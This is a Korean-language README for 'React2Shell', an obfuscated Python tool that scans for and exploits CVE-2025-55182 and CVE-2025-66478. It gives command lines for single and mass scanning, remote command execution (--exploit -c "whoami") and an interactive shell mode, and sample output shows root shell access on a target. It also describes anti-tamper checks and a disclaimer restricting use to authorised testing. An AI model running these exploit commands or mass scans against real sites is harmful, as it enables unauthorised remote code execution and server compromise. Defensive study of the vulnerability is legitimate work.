
React2Shell - CVE-2025-55182 & CVE-2025-66478
제작자: LAKSHMIKANTHAN K (letchupkt)
인스타그램: @letchu_pkt
버전: 2.0.0 (난독화됨)
날짜: 2025-12-07
python react2shell.py
끝입니다! 스캐너가:
[1] 단일 URL 스캔
[2] 파일에서 여러 URL 스캔
[3] 단일 URL 공격
[4] 파일에서 여러 URL 공격
[5] 대화형 셸 (공격 모드)
[6] 설정
[7] 이전 결과 보기
[0] 종료
python react2shell.py
# 단일 URL 스캔
python react2shell.py -u https://target.com
# 여러 URL 스캔
python react2shell.py -f targets.txt
# 명령어로 공격
python react2shell.py -u https://target.com --exploit -c "whoami"
# 스레드를 사용한 대량 스캔
python react2shell.py -f targets.txt -t 20 -o results.json
스캐너를 실행할 때마다 자동으로:
난독화된 코드를 누군가 수정하려고 하면:
[ERROR] 스캐너 무결성 검사 실패!
[!] 스캐너 코드가 변조되었습니다.
[!] 이 도구는 LAKSHMIKANTHAN K (letchupkt)의 보호된 도구입니다.
Instagram: @letchu_pkt
스캐너는 변조를 감지하면 실행을 거부합니다.
모든 원래 기능은 100% 유지됩니다:
python react2shell.py -u https://example.com
출력:
=================================================================
CVE 스캐너 - CVE-2025-55182 & CVE-2025-66478
제작자: LAKSHMIKANTHAN K (letchupkt)
인스타그램: @letchu_pkt
=================================================================
[*] 스캔 중: https://example.com
[+] 취약함: https://example.com
버전: 15.0.1
CVE-2025-55182: 취약함
CVE-2025-66478: 취약함
python react2shell.py
# 옵션 5 선택
# 대상 URL 입력
셸 세션:
shell> whoami
root
shell> pwd
/app
shell> ls -la
total 120
drwxr-xr-x 1 root root 4096 Dec 6 10:30 .
...
shell> exit
python react2shell.py -f targets.txt -t 20 -o results.json
이 도구는 승인된 보안 테스트 전용입니다!
✅ 자신의 애플리케이션
✅ 승인된 침투 테스트
✅ 버그 바운티 프로그램 (범위 내)
✅ 보안 연구 (승인됨)
❌ 승인되지 않은 스캔
❌ 승인되지 않은 공격
❌ 모든 불법 활동
❌ 서비스 약관 위반
제작자(LAKSHMIKANTHAN K)는 이 도구의 오용에 대한 책임을 지지 않습니다. 사용자는 자신의 행동에 대해 전적으로 책임을 지며 모든 관련 법률을 준수해야 합니다.
원인: 파일이 손상됨
해결 방법: 새 복사본 다운로드
원인: 파일이 수정됨
해결 방법: 새 복사본 다운로드 (파일을 수정하지 마세요)
원인: 종속성이 누락됨
해결 방법:
pip install requests urllib3
원인: 압축 해제 오버헤드 (최소)
참고: 시작 시 한 번만 발생하며, 그 후에는 정상 속도로 실행됩니다.
A: 코드는 난독화되고 압축되었습니다. 코드를 읽어야 한다면 원래의 난독화되지 않은 버전을 사용할 수 있습니다.
A: 영향은 최소입니다. 시작 시 압축 해제를 위한 약간의 지연(~0.1초)이 있으며, 그 후에는 정상 속도로 실행됩니다.
A: 아니요. 수정하면 무결성 검사가 실패하고 스캐너가 실행을 거부합니다.
A: 난독화는 암호화가 아닙니다. 결정적인 공격자는 여전히 리버스 엔지니어링할 수 있지만 매우 어렵고 시간이 많이 걸립니다.
A: 인스타그램 @letchu_pkt로 제작자에게 연락하세요.
이름: LAKSHMIKANTHAN K (letchupkt)
인스타그램: @letchu_pkt
문제가 발생하면:
pip install requests urllib3
python react2shell.py
대화형 메뉴에서 선택하거나 CLI 모드를 사용하세요.
안내에 따르거나 명령줄 인수를 제공하세요.
# 대화형 모드
python react2shell.py
# 단일 URL 스캔
python react2shell.py -u https://target.com
# 대량 스캔
python react2shell.py -f targets.txt -t 20
# 공격
python react2shell.py -u https://target.com --exploit -c "whoami"
# 도움말
python react2shell.py --help
LAKSHMIKANTHAN K (letchupkt)
인스타그램: @letchu_pkt
CVE 스캐너를 사용해 주셔서 감사합니다! 🚀
버전: 2.0.0 (난독화됨)
날짜: 2025-12-07
라이선스: 승인된 보안 테스트 전용